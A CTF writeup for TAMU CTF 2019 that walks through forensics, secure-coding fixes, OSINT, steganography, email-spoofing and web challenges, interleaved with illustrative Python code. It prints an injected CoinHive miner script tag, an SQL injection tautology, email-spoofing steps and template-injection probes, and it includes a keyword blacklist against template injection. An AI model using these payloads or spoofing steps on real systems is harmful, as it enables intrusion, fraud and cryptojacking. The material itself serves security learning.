  • I like TAMU CTFs for their scenario-based questions with continuous problem solving, and for the variety of the CTF arena (android, pentest, network along with the general categories), which is a good place to get started.

  • Problems/writeups are listed by category

  • With everything going on and as a single-member team (TopWing), I managed to take up as many challenges as possible spanning various categories! Ended up around rank 200 on the scoreboard. I also solved some extra challenges (partial work done before) after the CTF.

Scenario Based Problems

One big scenario broken into a number of problems/puzzles/questions to be solved.


1) 0_intrusion

  • Given index.html; when requested in a browser it is evident the page is slow, as it keeps loading for a long time (the Chrome tab's loading icon keeps looping)

  • Looking at the page source –> a glance spots a number of JS files being loaded, but one is referred to by a bare IP (a third-party script). The line is obviously odd without any hostname (Easy)

  • Further evidence in the Chrome Network tab
  • Flag:
    <script src =></script><script>var color = new CoinHive.Anonymous("123456-asdfgh");color.start()</script></body>

2) 1_logs

Following up on the attack above, we have:


  • A packet capture (pcap)
  • The web server logs (the full base directory of the website)

As usual, I tried to leverage my new pcap parser (using scapy and pyshark) to analyse this capture, extracting the full-duplex streams from the pcap.

  • Output of Full Duplex streams {'': {'mac': '02:42:0a:5e:c8:b5'}, '': {'mac': '08:00:27:ed:bd:bb'}, '': {'mac': '02:42:0a:bb:c3:5f'}, '': {'mac': '02:42:0a:14:66:7e'}, '': {'mac': '02:42:0a:aa:e6:78'}, '': {'mac': '02:42:0a:28:b4:3a'}, '': {'mac': '02:42:0a:52:5a:cb'}}
  • This capture was interesting because not all the ports that were contacted were actually used for a connection. Even though the output above shows all the streams (including the failed port-scan traffic), the attackers enumerated the ports, which was the interesting thing to consider.

  • Looking at the streams above, it is evident that the answer to the first question is the one IP which scanned all the ports –>

  • For the ports which remained open on the web server (I did not yet have a way to visualize this behavior), I resorted to Wireshark: filter on the known attacker IP plus the server IP and the TCP flags –> ip.dst == && (tcp.flags.ack==1 && tcp.flags.syn==1) (a SYN-ACK response means the TCP port is open). This returns the ports which responded successfully and were open –> 22, 80 (evident from the filtered Wireshark results)

  • For the third question, all the files that were exposed, I used a hybrid technique. Noted that file-name enumeration was performed and only the files that actually existed on the web server were asked for.
    1. Used the HTTP access logs, keeping requests that returned HTTP 200 (apache2 access.log)
    2. Export HTTP objects in Wireshark (which included files that did not exist) –> ensured no files with an invalid HTTP status were counted.


1) 0_Network_Enumeration

  • Looking at the captures, we could easily spot HTTP packets communicating with (which should be a web server)
    1. The web server's responses to HTTP requests, with status codes
    2. Number of hosts that contacted it
      • Output all full-duplex streams
        - Used tshark or scapy's rdpcap().sessions()
        - I have written a wrapper at pcapxray which I reused
      • Used pcapxray (new pcap engine)
        - 13 (counting only http/https)
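The three questions from 1_logs (who scanned, which ports answered, which files were actually served) and the host count from 0_Network_Enumeration all reduce to simple passes over flow records and access-log lines. The following is an added example, not the writeup's pcapxray code or any tool's output: the packet tuples are constructed to resemble what scapy's sessions() or tshark yields after parsing, the addresses 10.0.0.5 (assumed server), 203.0.113.7 and 10.0.0.9/12 are invented, and the Apache lines are likewise constructed.

```python
"""Forensic checks over constructed TCP flow records and Apache access-log lines.

Added example (not from the writeup). Tuple layout: (src, dst, service_port, flags),
where service_port is always the server-side port and flags is "S" (SYN),
"SA" (SYN-ACK) or "R" (RST), as a capture tool would summarise them.
"""
from collections import defaultdict
import re

SERVER = "10.0.0.5"  # assumed address of the web server in the capture

PACKETS = [  # constructed sample traffic
    ("203.0.113.7", SERVER, 22, "S"),   (SERVER, "203.0.113.7", 22, "SA"),
    ("203.0.113.7", SERVER, 23, "S"),   (SERVER, "203.0.113.7", 23, "R"),
    ("203.0.113.7", SERVER, 80, "S"),   (SERVER, "203.0.113.7", 80, "SA"),
    ("203.0.113.7", SERVER, 443, "S"),  (SERVER, "203.0.113.7", 443, "R"),
    ("203.0.113.7", SERVER, 8080, "S"), (SERVER, "203.0.113.7", 8080, "R"),
    ("10.0.0.9", SERVER, 80, "S"),      (SERVER, "10.0.0.9", 80, "SA"),
    ("10.0.0.12", SERVER, 80, "S"),     (SERVER, "10.0.0.12", 80, "SA"),
]

def ports_probed_by_source(packets, server):
    """Map each client to the set of server ports it sent a SYN to."""
    probed = defaultdict(set)
    for src, dst, port, flags in packets:
        if dst == server and flags == "S":
            probed[src].add(port)
    return probed

def likely_scanner(packets, server, threshold=3):
    """The client that SYN'd the most distinct ports, if that count reaches the threshold."""
    probed = ports_probed_by_source(packets, server)
    if not probed:
        return None
    src, ports = max(probed.items(), key=lambda kv: len(kv[1]))
    return src if len(ports) >= threshold else None

def open_ports(packets, server, client):
    """Server ports that answered the client with SYN-ACK (the tcp.flags.syn==1 && ack==1 filter)."""
    return sorted({port for src, dst, port, flags in packets
                   if src == server and dst == client and flags == "SA"})

def http_client_count(packets, server):
    """Distinct hosts that opened a connection to the server's HTTP/HTTPS ports."""
    return len({src for src, dst, port, flags in packets
                if dst == server and port in (80, 443) and flags == "S"})

# Constructed Apache combined-format lines (the access.log of the scenario is not reproduced here)
ACCESS_LOG = """\
203.0.113.7 - - [04/Mar/2019:11:02:10 +0000] "GET /index.html HTTP/1.1" 200 1043
203.0.113.7 - - [04/Mar/2019:11:02:11 +0000] "GET /admin.php HTTP/1.1" 404 209
203.0.113.7 - - [04/Mar/2019:11:02:11 +0000] "GET /backup.zip HTTP/1.1" 200 51234
203.0.113.7 - - [04/Mar/2019:11:02:12 +0000] "GET /.git/config HTTP/1.1" 403 199
10.0.0.9 - - [04/Mar/2019:11:05:40 +0000] "GET /index.html HTTP/1.1" 200 1043
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]+" (\d{3}) \d+')

def exposed_files(log_text, client=None):
    """Paths the server actually served (status 200), optionally restricted to one client."""
    found = set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, path, status = m.groups()
        if status == "200" and (client is None or ip == client):
            found.add(path)
    return sorted(found)

if __name__ == "__main__":
    attacker = likely_scanner(PACKETS, SERVER)
    print("scanner:", attacker)
    print("ports that answered the scanner with SYN-ACK:", open_ports(PACKETS, SERVER, attacker))
    print("hosts talking HTTP/HTTPS to the server:", http_client_count(PACKETS, SERVER))
    print("files actually served to the scanner:", exposed_files(ACCESS_LOG, attacker))
```

Cross-checking the access log against the SYN-ACK list is the same hybrid the writeup describes: the log alone would list 404s from the enumeration, and the capture alone would include objects for files that never existed.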

2) 1_Discovery

  • The attack happened via exfiltration –> the web server sends data over ICMP, HTTP and DNS to the attacker's IP.

  • Time calculation


  • Reading Rainbow: 1_Discovery
    • Host that is extracting the data
    • Time
      • 11:09
    • Protocols
      • DNS, HTTP, ICMP
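The signature in 1_Discovery is one internal host pushing data to one external address over several protocols, and the question is when that started. The following is an added example of that detection, not the writeup's code: the packet summaries are constructed, 10.0.0.5 is an assumed internal web server, 198.51.100.23 an assumed attacker address, and the 10.0.0.0/8 "internal" rule is an assumption about the capture.

```python
"""Flag (internal host, external destination) pairs that use several channels or move a lot of data.

Added example, not from the writeup. Records: (timestamp, src, dst, protocol, payload_bytes).
"""
from collections import defaultdict
from datetime import datetime

PACKETS = [  # constructed sample traffic
    ("2019-03-04 11:09:02", "10.0.0.5", "198.51.100.23", "ICMP", 1400),
    ("2019-03-04 11:09:03", "10.0.0.5", "198.51.100.23", "ICMP", 1400),
    ("2019-03-04 11:09:10", "10.0.0.5", "198.51.100.23", "DNS", 230),
    ("2019-03-04 11:09:11", "10.0.0.5", "198.51.100.23", "DNS", 231),
    ("2019-03-04 11:10:01", "10.0.0.5", "198.51.100.23", "HTTP", 65000),
    ("2019-03-04 11:08:30", "10.0.0.9", "10.0.0.5", "HTTP", 512),     # ordinary internal request
    ("2019-03-04 11:08:31", "10.0.0.5", "10.0.0.9", "HTTP", 2048),    # ... and its reply
    ("2019-03-04 11:12:00", "10.0.0.5", "8.8.8.8", "DNS", 64),        # a normal-looking lookup
]

def is_internal(ip):
    return ip.startswith("10.")  # assumption: the capture's internal range is 10.0.0.0/8

def outbound_profile(packets):
    """Per (internal src, external dst): protocols used, bytes sent, earliest timestamp."""
    prof = defaultdict(lambda: {"protocols": set(), "bytes": 0, "first_seen": None})
    for ts, src, dst, proto, size in packets:
        if not is_internal(src) or is_internal(dst):
            continue  # only traffic leaving the network matters for exfiltration
        p = prof[(src, dst)]
        p["protocols"].add(proto)
        p["bytes"] += size
        t = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        if p["first_seen"] is None or t < p["first_seen"]:
            p["first_seen"] = t
    return prof

def exfil_candidates(packets, min_protocols=2, min_bytes=10_000):
    """Pairs that used several channels or moved a lot of data, with the time the activity began."""
    hits = []
    for (src, dst), p in outbound_profile(packets).items():
        if len(p["protocols"]) >= min_protocols or p["bytes"] >= min_bytes:
            hits.append({"host": src, "destination": dst,
                         "protocols": sorted(p["protocols"]),
                         "bytes": p["bytes"],
                         "first_seen": p["first_seen"].strftime("%H:%M")})
    return hits

if __name__ == "__main__":
    for hit in exfil_candidates(PACKETS):
        print(hit)
```

The thresholds are deliberately loose; in a real capture the DNS channel is the one most likely to hide below a byte threshold, which is why the protocol-count rule is kept alongside it.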


1) 0_intrusion

  • Taking an overview of the pcap file with Wireshark for HTTP/TLS packets.
  • Checking the SSL connections –> certificate information
  • The attacker's certificate organization says Dummy, the obvious answer

Secure Coding

1) SQL

  • Challenge: Fix SQL Injection attack
    Now that you have broken the SQL Injection challenge it's your turn to fix it!
  • Fixing Code - Using Prepared Statements
    /* Create prepared statements: user input is bound as data and never concatenated into the query */
    $user = $_POST['username'];
    $pass = $_POST['password'];
    $ps = $conn->prepare("SELECT * FROM login WHERE User=? AND Password=?");
    $ps->bind_param("ss", $user, $pass);
    $ps->execute();  /* the statement has to be executed before get_result() returns anything */
    if ($result = $ps->get_result()) {
      if ($result->num_rows >= 1) {
        $row = $result->fetch_assoc();
        echo "<html>You logged in as " . $row["User"] . "</html>\n";
      } else {
        echo "Sorry to say, that's invalid login info!";
      }
    }
    $ps->close();
    /* Note: comparing a plaintext Password column is a separate weakness; this fix only addresses injection */
  • Run Log and Flag

2) PWNCoding

  • Challenge: Fix Buffer overflow attack
  • Fixing Code - using fgets to limit size of input
// Refer https://www.synopsys.com/blogs/software-security/detect-prevent-and-mitigate-buffer-overflow-attacks/
// fgets() reads at most sizeof(buf)-1 bytes and NUL-terminates, so the input can never overrun buf
// (sizeof(buf) is the buffer length only when buf is a local array, not a pointer)
fgets(buf, sizeof(buf), stdin);
  • Run log and flag

3) Science

  • Challenge: Fix template injection attack in a Flask App
  • Fixing Code - Input Sanitization (especially blocking template execution functions - http://flask.pocoo.org/docs/1.0/templating/ )
# Input sanitize with a function/keyword blacklist
# (a stopgap: a blacklist can be worked around; the robust fix is to pass user input
#  to the template as a variable instead of rendering it as template source)
blacklist = ["config", "self", "request", "q", "__class__", "__dict__", "__group__", "session", "__", "[", "]", ", "]

def sanitize(chem1, chem2):
    """Return an error message if either input contains a banned token, else None."""
    for banned in blacklist:
        if banned in chem1 or banned in chem2:
            return "Template injection hack attempt!. Sorry, Something went wrong"
    return None
  • Run log and flag
  • What did not work?
    • Just removing the  to prevent template execution did not work. Using the escape function to escape HTML did not work either, as it only escapes the HTML that is returned.
    • Blacklisting a subset of types
    • Not blacklisting some characters such as "[]'._-__ leaves the possibility to inject


1) Howdy

Initial introductory challenge to expose the flag format


2) Who Am I?

  • Challenge:
  • Answer

3) Who Do I Trust ?

  • Challenge:
  • Answer

4) Where Am I ?

  • Challenge:
  • For this one I wanted to put my tool urlRecon to use to perform reconnaissance on the URL. The city in the geolocation output is the flag.
root@kali:~/Downloads/urlRecon/urlrecon# cat ctf.txt 

(s) root@kali:~/Downloads/urlRecon/urlrecon# python main.py f ctf.txt 
 ==> Program Started at 2019-03-04 08:05:42.132872
 ==> Fetching Information for various URLs . 

 ==> Program ended at 2019-03-04 08:05:45.103283
 ==> Output Successfully Generated at /root/Downloads/urlRecon/urlrecon
 ==> Time for the Program to Complete Execution = 0:00:02.970411
 =========> Program Finished Successfully !!!

(s) root@kali:~/Downloads/urlRecon/urlrecon# ls
ctf.txt  examples  main.py  modules  report  s
(s) root@kali:~/Downloads/urlRecon/urlrecon# cd report/
(s) root@kali:~/Downloads/urlRecon/urlrecon/report# ls
report.txt  urlInformation.db  urlLocation.kml
(s) root@kali:~/Downloads/urlRecon/urlrecon/report# cat report.txt 

URL: https://tamuctf.com

Domain: tamuctf.com

DNS: ['']

whoIs Data: {
  "IpWhoIsResult": {
    "asn": "16509", 
    "asn_cidr": "", 
    "asn_country_code": "US", 
    "asn_date": "2015-09-02", 
    "asn_description": "AMAZON-02 - Amazon.com, Inc., US", 
    "asn_registry": "arin", 
    "entities": [
    "network": {
      "cidr": "", 
      "country": null, 
      "end_address": "", 
      "events": [
          "action": "last changed", 
          "actor": null, 
          "timestamp": "2015-09-02T13:06:29-04:00"
          "action": "registration", 
          "actor": null, 
          "timestamp": "2015-09-02T13:06:28-04:00"
      "handle": "NET-52-32-0-0-1", 
      "ip_version": "v4", 
      "links": [
      "name": "AT-88-Z", 
      "notices": [
          "description": "By using the ARIN RDAP/Whois service, you are agreeing to the RDAP/Whois Terms of Use", 
          "links": [
          "title": "Terms of Service"
          "description": "If you see inaccuracies in the results, please visit: ", 
          "links": [
          "title": "Whois Inaccuracy Reporting"
          "description": "Copyright 1997-2019, American Registry for Internet Numbers, Ltd.", 
          "links": null, 
          "title": "Copyright Notice"
      "parent_handle": "NET-52-0-0-0-0", 
      "raw": null, 
      "remarks": null, 
      "start_address": "", 
      "status": [
      "type": "DIRECT ALLOCATION"
    "nir": null, 
    "objects": {
      "AT-88-Z": {
        "contact": {
          "address": [
              "type": null, 
              "value": "410 Terry Ave N.\nSeattle\nWA\n98109\nUnited States"
          "email": null, 
          "kind": "org", 
          "name": "Amazon Technologies Inc.", 
          "phone": null, 
          "role": null, 
          "title": null
        "entities": [
        "events": [
            "action": "last changed", 
            "actor": null, 
            "timestamp": "2017-01-28T08:32:29-05:00"
            "action": "registration", 
            "actor": null, 
            "timestamp": "2011-12-08T13:34:25-05:00"
        "events_actor": null, 
        "handle": "AT-88-Z", 
        "links": [
        "notices": null, 
        "raw": null, 
        "remarks": [
            "description": "All abuse reports MUST include:\r\n* src IP\r\n* dest IP (your IP)\r\n* dest port\r\n* Accurate date/timestamp and timezone of activity\r\n* Intensity/frequency (short log extracts)\r\n* Your contact details (phone and email) Without these we will be unable to identify the correct owner of the IP address at that point in time.", 
            "links": null, 
            "title": "Registration Comments"
        "roles": [
        "status": null
    "query": "", 
    "raw": null
  "WhoIsComResult": {
    " Name": " tamuctf.com\r", 
    "&gt;&gt;&gt; Last update of WHOIS database": " 2019-03-03T16", 
    "Admin City": " College Station\r", 
    "Admin Country": " US\r", 
    "Admin Email": " <img src=\"/eimg/1/0f/10f8478dcca1d5e42f6ac97667f2cae578fbaed1.png\" class=\"whois_email\" alt=\"email\">@tamu.edu\r", 
    "Admin Name": " Daniel Ragsdale\r", 
    "Admin Organization": " Texas A&M Cybersecurity Center\r", 
    "Admin Phone": " +979.8457398\r", 
    "Admin Postal Code": " 77843\r", 
    "Admin State/Province": " Texas\r", 
    "Admin Street": " 4254 TAMU\r", 
    "Creation Date": " 2018-08-20T20", 
    "DNSSEC": " unsigned\r", 
    "Domain Status": " clientTransferProhibited https", 
    "Name Server": " c.ns.joker.com\r", 
    "Registrant City": " College Station\r", 
    "Registrant Country": " US\r", 
    "Registrant Email": " <img src=\"/eimg/1/0f/10f8478dcca1d5e42f6ac97667f2cae578fbaed1.png\" class=\"whois_email\" alt=\"email\">@tamu.edu\r", 
    "Registrant Name": " Daniel Ragsdale\r", 
    "Registrant Organization": " Texas A&M Cybersecurity Center\r", 
    "Registrant Phone": " +979.8457398\r", 
    "Registrant Postal Code": " 77843\r", 
    "Registrant State/Province": " Texas\r", 
    "Registrant Street": " 4254 TAMU\r", 
    "Registrar": " CSL Computer Service Langenbach GmbH d/b/a joker.com\r", 
    "Registrar Abuse Contact Email": " <img src=\"/eimg/4/31/4314d7b7cb6fcbd8216fd48ab77de993df2c463f.png\" class=\"whois_email\" alt=\"email\">@joker.com\r", 
    "Registrar Abuse Contact Phone": " +49.21186767447\r", 
    "Registrar IANA ID": " 113\r", 
    "Registrar Registration Expiration Date": " 2019-08-20T20", 
    "Registrar URL": " https", 
    "Registrar WHOIS Server": " whois.joker.com\r", 
    "Registry Domain ID": " 2300145411_DOMAIN_COM-VRSN\r", 
    "Tech City": " College Station\r", 
    "Tech Country": " US\r", 
    "Tech Email": " <img src=\"/eimg/1/0f/10f8478dcca1d5e42f6ac97667f2cae578fbaed1.png\" class=\"whois_email\" alt=\"email\">@tamu.edu\r", 
    "Tech Name": " Daniel Ragsdale\r", 
    "Tech Organization": " Texas A&M Cybersecurity Center\r", 
    "Tech Phone": " +979.8457398\r", 
    "Tech Postal Code": " 77843\r", 
    "Tech State/Province": " Texas\r", 
    "Tech Street": " 4254 TAMU\r", 
    "URL of the ICANN Whois Inaccuracy Complaint Form": " https", 
    "Updated Date": " 2018-08-20T20"

Server Fingerprint: None

Geo Location: {
  "asn": "AS16509", 
  "city": "Boardman", 
  "continent_code": "NA", 
  "country": "US", 
  "country_calling_code": "+1", 
  "country_name": "United States", 
  "currency": "USD", 
  "in_eu": false, 
  "ip": "", 
  "languages": "en-US,es-US,haw,fr", 
  "latitude": 45.8491, 
  "longitude": -119.7143, 
  "org": "Amazon.com, Inc.", 
  "postal": "97818", 
  "region": "Oregon", 
  "region_code": "OR", 
  "timezone": "America/Los_Angeles", 
  "utc_offset": "-0800"
  • Answer

5) I heard you like files?

–> Yay! Stegano

  • Challenge
  • Given: a PNG file, and the hint says PDF research was done. Let's look for PDF files…
  • Initial recon of the PNG using the usual img_info, binwalk, file and pngcheck gives away a number of signs that the PNG file carries much more data

    • binwalk helped to detect and extract the corresponding files
  • binwalk extracts known types (for easy scanning) with the command binwalk -e art.png (reference: https://stackoverflow.com/questions/36530643/use-binwalk-to-extract-all-files)

  • Files directory after the first binwalk extract

    not_the_flag.txt - obviously doesn't have the flag
    A bunch of font files, a PDF file (dummy text), metadata and some directories

  • The word/media folder seems interesting and it contains another image file as well –> /word/media/image1.png. Repeat the above steps on the new image…
> The issue here is that even though binwalk shows the existence of a PNG file and a PDF file, extracting only the known types with the `-e` option doesn't help (file magic-number headers + trailers remain undetected).
> Extract everything with the option binwalk -D='.*' image1.png
  • As we saw in the binwalk output, 1485 is the offset of the PDF file. So we change the extension to pdf to view this file. (We only get a new image and a PDF file.)
  • Opening the PDF file shows…
  • After digging for a long time, I read the PDF file from top to bottom to check whether there was any hidden text or an unexposed hidden section in the PDF. Found a string in the trailer which looked encoded. Decoded the base64 to obtain the answer. (Learning: keep digging and don't stop –> look at all the minimal details.)
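What binwalk did in this challenge is signature scanning: find the magic bytes of known formats inside a blob, pair each with its trailer, and slice the region out. The following is an added example of that, not binwalk's code or the writeup's: the blob is a constructed fake PNG with a small PDF appended, so the offsets are invented and differ from the challenge's 1485, and the base64 string hidden after the PDF's `trailer` keyword is a placeholder in the flag format, not the real flag.

```python
"""Locate embedded files by magic number and trailer, carve them, and check the PDF trailer for base64.

Added example, not from the writeup or from binwalk. All input bytes below are constructed.
"""
import base64
import re

# (header magic, trailer magic or None when the format has no simple end marker)
SIGNATURES = {
    "png": (b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82"),
    "pdf": (b"%PDF-", b"%%EOF"),
    "zip": (b"PK\x03\x04", None),
}

def find_embedded(blob):
    """Return [(kind, start, end)] for every header found; end is just past the trailer, or None."""
    hits = []
    for kind, (head, tail) in SIGNATURES.items():
        start = blob.find(head)
        while start != -1:
            end = None
            if tail is not None:
                t = blob.find(tail, start + len(head))
                if t != -1:
                    end = t + len(tail)
            hits.append((kind, start, end))
            start = blob.find(head, start + 1)
    return sorted(hits, key=lambda h: h[1])

def carve(blob, start, end):
    """Slice one embedded file out; with no trailer, take everything to the end of the blob."""
    return blob[start:end] if end is not None else blob[start:]

# a run of 16+ base64 characters with optional padding, not glued to other base64 characters
B64_TOKEN = re.compile(rb"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/])")

def base64_strings_in_trailer(pdf_bytes):
    """Decode base64-looking tokens that appear after the PDF's last 'trailer' keyword."""
    tail = pdf_bytes.rsplit(b"trailer", 1)[-1]
    out = []
    for m in B64_TOKEN.finditer(tail):
        try:
            out.append(base64.b64decode(m.group(0), validate=True).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            pass  # a token that happens to look like base64 but is not
    return out

# --- constructed sample: a minimal fake PNG, some junk, then a tiny PDF with a hidden string ---
HIDDEN = base64.b64encode(b"gigem{constructed_example_flag}")  # placeholder, not the real flag
PDF = (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"
       b"trailer\n<< /Root 1 0 R >>\n% " + HIDDEN + b"\nstartxref\n9\n%%EOF\n")
PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 40 + b"IEND\xaeB`\x82"   # header, fake chunk data, IEND
BLOB = PNG + b"garbage" + PDF

if __name__ == "__main__":
    for kind, start, end in find_embedded(BLOB):
        print(f"{kind} at offset {start} (ends at {end})")
    kind, start, end = find_embedded(BLOB)[-1]
    pdf = carve(BLOB, start, end)
    print("decoded from trailer:", base64_strings_in_trailer(pdf))
```

Carving up to the trailer is exactly why `-e` alone lost data in the challenge: anything the carver does not recognise between or after trailers is left behind, which is what the `-D` everything-extract worked around.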

6) OnBoarding Checklist

  • I had done some email spoofing before so I was pretty confident, but this one challenged me a bit. It was an interesting challenge that taught me about SMTP relaying.

  • Challenge

  • Understanding:
Spoof an email with
* FROM < someguy@somebigcorp.com > "authorized user"
* TO < tamuctf.com > "authorization provider"
* BODY < ***@gmail.com > "user being authorized < any fake gmail account >"
  • Use the MX DNS record (mail exchange server) of the somebigcorp.com domain to accomplish this
  • Try sending a spoofed email…

451 Relay not permitted error!

  • As noted, the recipient email is on Gmail. Try sending the spoofed email via Gmail's MX server (same steps as above)
  • That worked and I received the flag at my fake Gmail address
  • What did not work?
  • Before I found the reference below, I drained my motivation with the steps below.
  • As soon as I saw this challenge I resorted to using the mail exchange server of somebigcorp.com, via smtplib from Python against somebigcorp.com's mail server - Failed!
  • Did the same with Gmail's MX servers from smtplib with TLS, but that did not work either. Authentication was required as I connected to other Gmail mail servers. Even with authentication I was not able to spoof the email - Failed!
  • Went the script-kiddie route of using anonymous online mail services like anonymail to do the same. I did not get the flag as tamuctf was smarter. - Failed!
  • After a series of research, mitigations have been put in place for relay errors, hence the only solution I assumed remained was to set up a relay SMTP server on Amazon EC2 or Google Cloud to increase the trust of the relay and use that. < This was pending until I found the helper >

  • Reference:
    • This read helped me a lot; I stumbled upon it while working on another challenge: https://medium.com/@the4rchangel/email-spoofing-with-netcat-telnet-e558e4a10c1
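The "451 Relay not permitted" from somebigcorp.com's MX and the acceptance by the MX that serves the recipient domain are two outcomes of the same rule every receiving mail server applies at RCPT TO. The following is an added model of that decision, not the writeup's code or any MTA's: somebigcorp.com, the mailbox names and the set of domains each MX is authoritative for are all assumed, and the model deliberately shows that a destination MX does not check the MAIL FROM domain at this step (the gap that SPF/DKIM/DMARC exist to close; they are not modelled here).

```python
"""Model of an MX server's relay decision at RCPT TO, and the SMTP exchange leading up to it.

Added example (not from the writeup). Domains, mailboxes and host names are invented.
"""

def relay_decision(server_domains, rcpt_to, authenticated=False):
    """Return the SMTP reply an MX gives at RCPT TO.

    An MX accepts mail FOR the domains it is authoritative for from anyone (that is its job),
    and accepts mail for OTHER domains only from authenticated senders; anything else would
    make it an open relay, which is what the 451 refusal prevents.
    """
    rcpt_domain = rcpt_to.rsplit("@", 1)[-1].lower()
    if rcpt_domain in server_domains:
        return "250 OK"                      # final delivery: MAIL FROM is not verified here
    if authenticated:
        return "250 OK"                      # outbound relay on behalf of a logged-in user
    return "451 Relay not permitted"         # refuse to carry third-party mail

def dialogue(server_domains, mail_from, rcpt_to, authenticated=False):
    """The client/server lines up to the point where the relay decision is returned."""
    return [
        ("C", "HELO client.example.test"),
        ("S", "250 Hello"),
        ("C", f"MAIL FROM:<{mail_from}>"),
        ("S", "250 OK"),
        ("C", f"RCPT TO:<{rcpt_to}>"),
        ("S", relay_decision(server_domains, rcpt_to, authenticated)),
    ]

# assumed actors, mirroring the writeup's setup
SENDER = "someguy@somebigcorp.com"           # the address being forged
RECIPIENT = "onboarding@tamuctf.com"         # assumed mailbox at the 'authorization provider'
SOMEBIGCORP_MX = {"somebigcorp.com"}         # authoritative for its own domain only
RECIPIENT_MX = {"tamuctf.com", "gmail.com"}  # assumed: the recipient domain's mail is hosted there

if __name__ == "__main__":
    for label, domains in (("somebigcorp.com MX", SOMEBIGCORP_MX), ("recipient MX", RECIPIENT_MX)):
        print(f"--- talking to {label} ---")
        for side, line in dialogue(domains, SENDER, RECIPIENT):
            print(f"{side}: {line}")
```

The defender's reading of the model: the only server that will ever accept `RCPT TO:<...@tamuctf.com>` unauthenticated is tamuctf.com's own MX, and that server's acceptance of an arbitrary MAIL FROM is why sender-domain policies (SPF, DKIM, DMARC) have to be checked by the receiver rather than trusted.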


1) Not another SQLI challenge

This is obvious as a login page is given. SQL inject the username and password.

  • Challenge
  • Target
  • Flag
  • Helper
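The login query behind this challenge and the Secure Coding SQL fix above are the same statement in two forms, one that parses user input as SQL and one that binds it as data. The following is an added example showing both side by side, not the challenge's or the PHP app's code: it uses sqlite3 in memory with a constructed `login` table so it runs offline, and the credential row is invented.

```python
"""A login query with string concatenation beside the same query with bound parameters.

Added example (not from the writeup). The table and its single row are constructed.
"""
import sqlite3

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (User TEXT, Password TEXT)")
    conn.execute("INSERT INTO login VALUES ('admin', 'correct horse battery staple')")  # constructed row
    return conn

def login_vulnerable(conn, user, pw):
    """String concatenation: quotes inside the input change the structure of the query."""
    sql = ("SELECT User FROM login WHERE User='" + user + "' AND Password='" + pw + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_prepared(conn, user, pw):
    """Placeholders: the driver passes the values separately, so they can only ever match data."""
    row = conn.execute("SELECT User FROM login WHERE User=? AND Password=?", (user, pw)).fetchone()
    return row[0] if row else None

TAUTOLOGY = "' OR '1'='1"  # the textbook probe: makes the WHERE clause always true in the concatenated form

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, tautology as password :", login_vulnerable(db, "admin", TAUTOLOGY))
    print("prepared,   tautology as password :", login_prepared(db, "admin", TAUTOLOGY))
    print("prepared,   real password         :", login_prepared(db, "admin", "correct horse battery staple"))
```

The prepared form returns None for the tautology because the whole string, quote included, is compared against the Password column; there is no query text for it to alter.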

2) Robots Rule

As the name says, it should deal with robots.txt, which provisions web crawling and blacklists/whitelists pages.

  • Challenge
  • The rule - There seems to be no Disallow rule. From the error message it is evident that it is expecting a bot User-Agent, especially Googlebot, based on the error returned.
  • Flag - Spoof a robot
  • Helper
    • https://www.keycdn.com/blog/web-crawlers

3) manyGigemsToYou

The website structure or map

  • index.html (just shows a thumbs-up image, and has many of them)
  • cookies.html (just shows a cookies image, and has many of them)
  • When cookies.html is accessed, there is a request to cook.js which returns 4 cookies (stored in the cache)
  • All cookie parameters seem valid. Also, the strings/tokens don't make any sense standalone.

Gigems page

Cookies page


– Looking at the SOURCE CODE: the prominent thing that is observable –> there are various strings

  • in the cookie
  • in the alt tag of the images

– Listing all the strings encountered here, eliminating repetition

##### Guess based on
# appending the "continue" pieces and reconstructing the flag.

##### All the strings encountered

=====> document.cookie 
gigem_continue: cookies}
Cookie: flag cookie gigem flag cookie
Gigs: all_the_cookies
Hax0r: flagflagflagflagflagflag

=====> Gigs! page

======> Cookie! page
gigem{continued == source_and_
  • Flag is Gigem{flag_in_source_and_cookies}

4) Science

  • Challenge
  • Given:
    • A website which takes INPUT and returns it in the output. A Flask service.
  • Thoughts:
    • This was the first time I was taking on a Flask CTF challenge. Looking for common vulnerabilities in the inputs
      • XSS and some other common vulns did not give results and did not make sense.
      • Fuzzing the input for a few seconds was meaningless
    • Looking for INPUT vulnerabilities in a Flask service turns up –> Template Injection
  • Initial test for template injection
Check the target website for the vulnerability in action
  • Read the Python Flask documentation for the template functions I can access. Try the basic config object
  • Test more functions (different data fetching) like self, config, request, get_url_for, __dict__, __globals__, environ, globals
    • This helped me solve the secure coding challenge to fix the code (sanitize inputs with the test)
Screenshots of different function output
  • Flag:
  • References:
    • https://www.we45.com/blog/server-side-template-injection-a-crash-course-
    • https://ctftime.org/writeup/10895
    • https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
    • https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti
    • https://medium.com/bugbountywriteup/tokyowesterns-ctf-4th-2018-writeup-part-3-1c8510dfad3f
    • https://damyanon.net/post/flask-series-security/
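Both this web challenge and the Secure Coding "Science" fix come down to one distinction: whether user input reaches the template engine as template source or as a variable. The following is an added example of that distinction, not the challenge's Flask app or the writeup's blacklist: it drives jinja2 directly (the engine behind Flask's render_template_string) so it runs without a web server, uses markupsafe's escape (installed with jinja2) for the HTML-escaping attempt the writeup says did not work, and the `chem` inputs are constructed.

```python
"""Template injection in jinja2: input as template source (vulnerable) versus input as data (fixed).

Added example (not from the writeup). Assumes jinja2 (and its dependency markupsafe) is installed.
"""
from jinja2 import Template
from markupsafe import escape

def render_unsafe(chem):
    """User input is spliced into the template SOURCE, so expressions inside it get evaluated."""
    return Template("<p>You entered: " + chem + "</p>").render()

def render_escaped_but_still_unsafe(chem):
    """HTML-escaping the input first does not help: {{ ... }} contains no HTML metacharacters,
    so the engine still sees it as an expression. This is the 'escape did not work' dead end."""
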